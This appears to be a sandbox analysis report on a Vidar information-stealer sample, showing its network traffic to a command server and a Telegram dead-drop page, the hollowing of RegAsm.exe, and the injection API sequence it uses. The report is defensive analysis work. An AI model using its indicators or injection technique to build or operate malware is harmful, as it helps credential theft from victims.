Jun 7, 2024 17:21:19.975898981 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:20.456638098 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:20.456891060 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:20.823193073 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:20.823297977 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:20.823671103 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:20.826066971 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:20.828552961 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:20.831006050 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:21.314388990 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:21.314951897 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:21.320019007 CEST	5432	49718	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:21.320080996 CEST	5432	49721	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:21.320090055 CEST	49718	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:21.320156097 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:21.322946072 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:21.327848911 CEST	5432	49721	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:21.520606041 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:21.520786047 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.167879105 CEST	5432	49721	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:22.167979002 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.168982983 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.173537970 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.173896074 CEST	5432	49721	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:22.177944899 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.179204941 CEST	5432	49721	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:22.179284096 CEST	49721	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.182898998 CEST	5432	49724	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:22.182976007 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.183320999 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:22.188182116 CEST	5432	49724	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.050522089 CEST	5432	49724	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.050597906 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.051089048 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.053745031 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.055943012 CEST	5432	49724	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.056859970 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.058887005 CEST	5432	49724	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.058968067 CEST	49724	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.061717033 CEST	5432	49727	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.061788082 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.062486887 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.067373037 CEST	5432	49727	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.907316923 CEST	5432	49727	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.907741070 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.908114910 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.913069010 CEST	5432	49727	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.942745924 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.948476076 CEST	5432	49727	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.948600054 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.948606014 CEST	49727	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.953555107 CEST	5432	49729	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:23.953665018 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.954025030 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:23.958966017 CEST	5432	49729	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:24.985136032 CEST	5432	49729	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:24.985222101 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.985809088 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.987963915 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.989233971 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.990719080 CEST	5432	49729	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:24.993396997 CEST	5432	49729	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:24.993459940 CEST	49729	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.994303942 CEST	5432	49731	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:24.994384050 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.994581938 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:24.999572992 CEST	5432	49731	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:25.843137026 CEST	5432	49731	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:25.843283892 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.843797922 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.848706007 CEST	5432	49731	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:25.852128983 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.857450962 CEST	5432	49731	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:25.857549906 CEST	49731	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.857711077 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.862992048 CEST	5432	51984	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:25.863076925 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.865555048 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:25.870470047 CEST	5432	51984	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:26.707370043 CEST	5432	51984	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:26.707676888 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:26.708149910 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:26.709861040 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:26.713129044 CEST	5432	51984	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:26.715197086 CEST	5432	51984	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:26.715358019 CEST	51984	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:22:31.518407106 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:22:31.518615961 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:22:31.642116070 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:22:31.642221928 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:22:54.462007046 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:22:54.462039948 CEST	49719	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:22:54.466979980 CEST	5432	49719	116.202.190.18	192.168.2.5
Jun 7, 2024 17:22:54.467191935 CEST	49719	5432	192.168.2.5	116.202.190.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2024 17:21:04.512676954 CEST	58913	53	192.168.2.5	1.1.1.1
Jun 7, 2024 17:21:04.519785881 CEST	53	58913	1.1.1.1	192.168.2.5
Jun 7, 2024 17:21:25.621989965 CEST	53	49795	1.1.1.1	192.168.2.5
Jun 7, 2024 17:21:40.356259108 CEST	53	55550	162.159.36.2	192.168.2.5
Jun 7, 2024 17:21:40.977365971 CEST	49906	53	192.168.2.5	1.1.1.1
Jun 7, 2024 17:21:40.985791922 CEST	53	49906	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 7, 2024 17:21:04.512676954 CEST	192.168.2.5	1.1.1.1	0x9fe0	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jun 7, 2024 17:21:40.977365971 CEST	192.168.2.5	1.1.1.1	0xb45f	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 7, 2024 17:21:04.519785881 CEST	1.1.1.1	192.168.2.5	0x9fe0	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Jun 7, 2024 17:21:40.985791922 CEST	1.1.1.1	192.168.2.5	0xb45f	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	149.154.167.99	443	2780	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-07 15:21:05 UTC	84	OUT	GET /r8z0l HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-06-07 15:21:05 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 07 Jun 2024 15:21:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12303 Connection: close Set-Cookie: stel_ssid=55a46eb7c12eec7355_2990827426554833759; expires=Sat, 08 Jun 2024 15:21:05 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-06-07 15:21:05 UTC	12303	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 72 38 7a 30 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @r8z0l</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.

Target ID:	0
Start time:	11:21:02
Start date:	07/06/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xff0000
File size:	442'408 bytes
MD5 hash:	7DC8189F70CC34E18EA7AF8FDEAC4142
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:21:03
Start date:	07/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa90000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	1613
Total number of Limit Nodes:	39

Executed Functions

Function 00FC018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00FC02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00FC030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00FC032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FC0351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00FC037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00FC03D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00FC041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FC045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 00FC0499
ResumeThread.KERNELBASE(?), ref: 00FC04A8

Strings

Load, xrefs: 00FC01CB
aryA, xrefs: 00FC01D3
GetP, xrefs: 00FC020F
ress, xrefs: 00FC0217

Memory Dump Source

Source File: 00000000.00000002.2070795087.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 2d8050ab5891d0a4540092cc26a8eb2fb4184bfec8869ce81db4866dcfd15df5
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 70B1E67664028AAFDB60CF68CD80BDA77A5FF88714F158524EA0CAB341D774FA418B94

Function 0100C44B Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85d9542f9fa04762e64eeb86abc2242e9e055aa6ff6fe517803ae84507f4694
Instruction ID: 1ea6429142d3165c1ea541681513ae9eb51cbade08a8921ef4b8de7bd2d5827d
Opcode Fuzzy Hash: f85d9542f9fa04762e64eeb86abc2242e9e055aa6ff6fe517803ae84507f4694
Instruction Fuzzy Hash: 9DE08C32915228EBDB16DBDCCA049AAF7ECFB45B00F520296BA91D3151C674DE00CBD0

Function 010049AA Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0474aabbf662809a2ff9b2b7148a1b0acd074440912c506b34a876e1c2f8a3
Instruction ID: ddb01cc04b67f39d615484118f6b691abb923357b876deb0ab2df1f400433cac
Opcode Fuzzy Hash: df0474aabbf662809a2ff9b2b7148a1b0acd074440912c506b34a876e1c2f8a3
Instruction Fuzzy Hash: 99C08CB400090087FE2B8A1892B03B43395F391782F900ADDCBC28B6C2C91E9882D601

Function 00FF5380 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00FF5397

Part of subcall function 00FF2241: _strlen.LIBCMT ref: 00FF2259

_strlen.LIBCMT ref: 00FF53B2
_strlen.LIBCMT ref: 00FF53C8
GetProcAddress.KERNEL32(00000000,?), ref: 00FF53E5
RegEnableReflectionKey.ADVAPI32(00000000), ref: 00FF53F6
DeleteAce.ADVAPI32(00000000,00000000), ref: 00FF5416

Strings

kernel32.dll, xrefs: 00FF5392
Cons, xrefs: 00FF53AC, 00FF53B1, 00FF53B9
ole, xrefs: 00FF53C2, 00FF53C7, 00FF53CF
Free, xrefs: 00FF539D
SVWj@h, xrefs: 00FF53FF

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: _strlen$AddressDeleteEnableHandleModuleProcReflection
String ID: Cons$Free$SVWj@h$kernel32.dll$ole
API String ID: 1962689627-3241830502
Opcode ID: f06a1e98d876164586c29352e5004338724ab6eeedca430b863ffac3f7c86806
Instruction ID: 03d8871abf08c69aa30762fd1918a84f0ea802e1dcb35b41e35e5a097fdd2cfb
Opcode Fuzzy Hash: f06a1e98d876164586c29352e5004338724ab6eeedca430b863ffac3f7c86806
Instruction Fuzzy Hash: 1111DF31D00208ABCB15EBA0DC459FFBBB8EF45760B100119F541A30A5DF7CAE02EBA0

Function 010076DE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,010077EB,00000000,01006599,00000000,00000000,?,?,01007A15,00000021,FlsSetValue,0101B3E8,0101B3F0,00000000), ref: 0100779F

Strings

api-ms-, xrefs: 01007735
ext-ms-, xrefs: 01007749

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b858f8c5979fc42a10a6e49dd8cb2ae54b77f7dd45447b9ac64bb14b06d95521
Instruction ID: 9b9c7c600486d6475d5d6a4cd6b409632febba2d2981121af15fe14c3945dbb1
Opcode Fuzzy Hash: b858f8c5979fc42a10a6e49dd8cb2ae54b77f7dd45447b9ac64bb14b06d95521
Instruction Fuzzy Hash: 4D219635A01211EBEB739669DC44A5A3799BB417A0F250154E9CBA72C5EB3DF900C6E0

Function 00FF5237 Relevance: 4.5, APIs: 3, Instructions: 34
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00FF524A
CreateThread.KERNELBASE(00000000,00000000,00000188,01023040,00000000,00000000), ref: 00FF527B
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 00FF5285

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: AllocCreateObjectSingleThreadVirtualWait
String ID:
API String ID: 2947710671-0
Opcode ID: 193be21e91f1035beb3b27b58ede4abe6da6f6eef00fe2e8ea88ecda600f9f15
Instruction ID: ff4c272beac32b6b52534674e7ee4c164ec19b7404781a5a067858ee80414dd7
Opcode Fuzzy Hash: 193be21e91f1035beb3b27b58ede4abe6da6f6eef00fe2e8ea88ecda600f9f15
Instruction Fuzzy Hash: 95E092F5700318BAE63222B29CCAFB7361CDB85BF5B000928F795A5085C96D9C009271

Function 01004936 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,01004930,?,?,?,?,9B609FF6), ref: 01004947
TerminateProcess.KERNEL32(00000000,?,01004930,?,?,?,?,9B609FF6), ref: 0100494E
ExitProcess.KERNEL32 ref: 01004960

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8201cc7c2bbf350581874a46a0a958e9607074dd5c2b739c70ba222c64612bd5
Instruction ID: 7043d1afe234133a964dca261808360ac0526d8a5ba2c9b3c432bafe0d87092a
Opcode Fuzzy Hash: 8201cc7c2bbf350581874a46a0a958e9607074dd5c2b739c70ba222c64612bd5
Instruction Fuzzy Hash: 8DD09E35000205EFEF632F60D80C9993F26AF50245B504060BB89860B5DB3A9A95DB95

Function 00FF6FD2 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF6F33: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,00FF6F85,00000000,?,00FF6FC6,00000000,?,00FF4225,00000000), ref: 00FF6F3F

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,9B609FF6,?,?,?,0101661D,000000FF), ref: 00FF7039

Part of subcall function 00FF4EB2: std::_Throw_Cpp_error.LIBCPMT ref: 00FF4ED3

Part of subcall function 00FF615F: ReleaseSRWLockExclusive.KERNEL32(00FF3E12,?,00FF3E1A,?,?,?,?,?,?,?,?,?,?,?,?,00FF1342), ref: 00FF6173

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
String ID:
API String ID: 3627539351-0
Opcode ID: e16cc4ad5601a67bb5e674da726ee4524bb0f539cabdc92d2736f0be4e00e43f
Instruction ID: 34d85cd79c7022ce128318318b3f8dac59b5b1e578ca6ca3d236c5af795b9bc7
Opcode Fuzzy Hash: e16cc4ad5601a67bb5e674da726ee4524bb0f539cabdc92d2736f0be4e00e43f
Instruction Fuzzy Hash: 98119332A04618ABCB256B25AC0663EB764EF40B24B00041EFB55972B1DF7EA801EA90

Function 010077A9 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcdcb7d8b618499f7414cf419fea2f7f99fa0f272b00f65bdfb0077614a3b81d
Instruction ID: 29e79a148f7c17fd30ebaf7bd51424dc0445595520e4e12e75ab1be915d1bbd6
Opcode Fuzzy Hash: dcdcb7d8b618499f7414cf419fea2f7f99fa0f272b00f65bdfb0077614a3b81d
Instruction Fuzzy Hash: 8301B5377402159BBB279D6DEC4495B3BD6FB85264B644124FAC5CB1C8EB39E802C790

Non-executed Functions

